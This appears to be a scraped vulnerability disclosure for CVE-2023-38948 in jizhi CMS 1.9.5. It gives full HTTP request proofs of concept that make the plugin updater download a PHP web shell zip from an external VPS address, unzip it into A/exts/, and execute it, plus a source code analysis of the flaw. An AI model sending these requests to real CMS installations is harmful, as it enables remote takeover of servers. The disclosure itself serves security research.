Headline

CVE-2023-38948: jizhi CMS 1.9.5 has a Arbitrary File Download RCE vulnerability via /A/c/PluginsController.php · Issue #I7LI4E · Pwn师傅/Pwn - Gitee.com

An arbitrary file download vulnerability in the /c/PluginsController.php component of jizhi CMS 1.9.5 allows attackers to execute arbitrary code via downloading a crafted plugin.

1 year ago

CVE

Open in Source

#vulnerability #web #mac #apple #js #git #java #intel #php #rce #chrome #webkit

Vulnerability lies in http://127.0.0.1/admin.php/Index/index.html
Extension management at, download location for plugin list

Click on any plugin of the cloud plugin to download
Burp Suite Packet capture

Can test parameters download_url

VPS enables HTTP service

Zip compress phpshell.php and upload to VPS

Successfully caused any file download
POC:
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 86
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=start-download&filepath=jzdesign&download_url=http://119.91.26.244:8090/phpshell.zip

Vulnerability source code analysis:
Global search for start-download to determine the location of file vulnerabilities
The vulnerability is located in /A/c/PluginsController.php

Line 739 starts with a case statement, followed by an fwrite write operation

Located on line 718, its controllable point is $download_ url, the path for writing has been provided on line 721, so why can I download any file? The cause of the vulnerability lies in

Starting from line 883, it is the default file download URL, but causing a change after the controllable $download_url on line 891, resulting in the vulnerability function being curl_ exec, due to a vulnerability in the curl resource request code, it is possible to arbitrarily request external resources and cause arbitrary file downloads

The function point that can be decompressed is located in the case statement ‘file-upzip’ on line 776

It will determine whether the file exists. If it exists, it will be saved in A/exts/, and the function will be called get_zip_orginalsize to start decompression work

While loop to extract each file

Successfully decompressed
POC:
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 32
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close

action=file-upzip&filepath=jzdesign

Access path is http://127.0.0.1/A/exts/phpshell.php

Successfully executing command causing RCE